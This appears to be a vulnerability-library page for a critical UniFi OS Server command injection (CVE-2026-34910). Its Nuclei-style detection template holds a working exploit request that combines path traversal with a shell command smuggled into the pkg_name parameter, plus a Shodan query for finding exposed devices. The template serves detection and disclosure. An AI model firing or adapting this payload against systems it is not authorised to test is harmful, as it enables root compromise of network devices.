/Vulnerability Library

UniFi OS Server - Command Injection

CVE-2026-34910
Verified

Description

A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.

Severity

Critical

CVSS Score

10

Exploit Probability

79%

Published Date

June 9, 2026

Template Author

kazgangap

CVE-2026-34910.yaml
id: CVE-2026-34910

info:
  name: UniFi OS Server - Command Injection
  author: Kazgangap
  severity: critical
  description: |
    A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.
  impact: |
    Network attackers can execute arbitrary commands, potentially leading to full system compromise.
  remediation: |
    Update to the latest version of UniFi OS.
  reference:
    - https://bishopfox.com/blog/popping-root-on-unifi-os-server-unauthenticated-rce-chain-detection-analysis
    - https://nvd.nist.gov/vuln/detail/CVE-2026-34910
    - https://community.ui.com/releases/Security-Advisory-Bulletin-064-064/84811c09-4cf4-42ab-bd61-cc994445963b
    - https://www.it-connect.tech/critical-3-exploit-chain-grants-root-access-on-unifi-os-server/
  classification:
    cve-id: CVE-2026-34910
    epss-score: 0.78555
    epss-percentile: 0.99536
    cvss-score: 10.0
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"UniFi OS"
  tags: cve,cve2026,unifi,rce,vkev,kev

http:
  - raw:
      - |
        GET /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package?pkg_name=%3b+nslookup+{{interactsh-url}}+%3b HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body , "CODE_SYSTEM_ERROR", "System failure")'
          - 'contains(interactsh_protocol, "dns")'
          - 'status_code == 200'
        condition: and
# digest: 490a004630440220100537fde7c5fe55093362961ed79b6c2335338a73000eb5873971fd5de363e5022016cebe9da44f13792100917022cb1c4a88498ef947ca148f3a10ecb5f92d31dc:922c64590222798bb761d5b6d8e72950
10.0Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE ID:
cve-2026-34910

References

https://bishopfox.com/blog/popping-root-on-unifi-os-server-unauthenticated-rce-chain-detection-analysishttps://nvd.nist.gov/vuln/detail/CVE-2026-34910https://community.ui.com/releases/Security-Advisory-Bulletin-064-064/84811c09-4cf4-42ab-bd61-cc994445963bhttps://www.it-connect.tech/critical-3-exploit-chain-grants-root-access-on-unifi-os-server/

Remediation Steps

Update to the latest version of UniFi OS.